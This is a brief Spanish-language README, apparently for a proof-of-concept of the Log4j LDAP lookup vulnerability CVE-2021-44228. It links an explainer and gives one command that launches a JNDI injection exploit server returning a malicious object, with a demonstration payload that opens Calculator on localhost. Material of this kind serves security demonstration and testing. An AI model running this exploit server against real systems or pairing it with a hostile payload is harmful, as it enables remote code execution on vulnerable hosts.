
Prueba de concepto de la vulnerabilidad de búsqueda LDAP en Apache Log4j. CVE-2021-44228
Prueba de concepto de la vulnerabilidad de búsqueda LDAP de Apache Log4j
Puedes leer más sobre la vulnerabilidad aquí: https://blog.cloudflare.com/inside-the-log4j2-vulnerability-cve-2021-44228/
¿Cómo ejecutar el servidor ldap proporcionado que devuelve un objeto malicioso ?
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "open /Applications/Calculator.app" -A "127.0.0.1"